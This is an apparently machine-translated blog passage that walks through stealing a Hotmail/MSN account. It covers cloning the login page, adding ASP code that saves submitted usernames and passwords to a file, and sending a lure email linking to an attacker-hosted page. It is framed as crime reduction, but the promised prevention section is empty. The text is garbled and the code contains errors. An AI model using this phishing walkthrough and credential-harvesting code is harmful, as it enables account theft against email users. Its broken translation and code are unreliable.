Last time we introducedwhat is thecross-site attacks(Cross Site Scripting), today we look at a specific example, and describes how to avoid suffering cross-site attacks.
“Cross-site intrusion”crime reduction: cross-site intrusion MSN hacking
We according to users provide clues to his MSN account is lost for crime reduction, and reasoning how hackers steal his MSN account.
The first step: hack the first to make a and the Hotmail login interface is the same as the forged web page. Sign in Hotmail official website, and then click in the menu bar“file”in the popup drop-down menu, select“Save As”, save the page down. Then use Dreamweaver and other web editing program can open saved web page in Figure 1, find the Enter the username and password of the position, added this user name and password-stealing code:
<% bbsuser =request("bbsuser ") bbspwd =request("bbspwd ") set fs=server. CreateObject("Scripting. FileSystemObject") //Open the file service set file=fs. OpenTaxtFile(server. MapPath("Hotmail.txt"),8,True) //Create the open"Hotmail.txt" file. writeline bbsuser+"----"+ bbspwd //Will receive user name and password write"Hotmail.txt" file. close set file=nothing set fs=nothing %>
Then Hotmail the original page in the link-local address and the associated parameters modified, so that the picture can display properly, and finally the web page is saved as“index. asp”and upload it to the hackers own website.
Second step: camouflage pages do well, the next hack will make cross-site Hotmail email. Generally hackers will choose to be directly in the message edit the HTML code of a software, such as DreamMail to. Start DreamMail, create a new support POP3 e-mail address.
Then click on DreamMail menu bar“view”“switch to the Deluxe version”option, but also with DreamMail new seal HTML blank email in mail content page, Click right key, select“Edit HTML source”in the pop-up HTML source editor window, enter the followingXSScross-site code:
In this code, The hack will be based on their camouflaged web address and email change“http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com” the link address. Message edited after clicking on“OK”to complete the Cross-Station messages are produced.
The third step: the hack will give yourself of this e-mail from a loud tempting name, and then sent to the victim's MSN mailbox, when the victim used Hotmail to view this email, it will pop up a Hotmail login box to trick you to enter the account number and password to login. The victim vigilance is weak, it will be in the malicious page, enter the account number and password, this information is not sent to Microsoft on the server, but quietly sent to the hack there 2 to.
Cross-site prevention program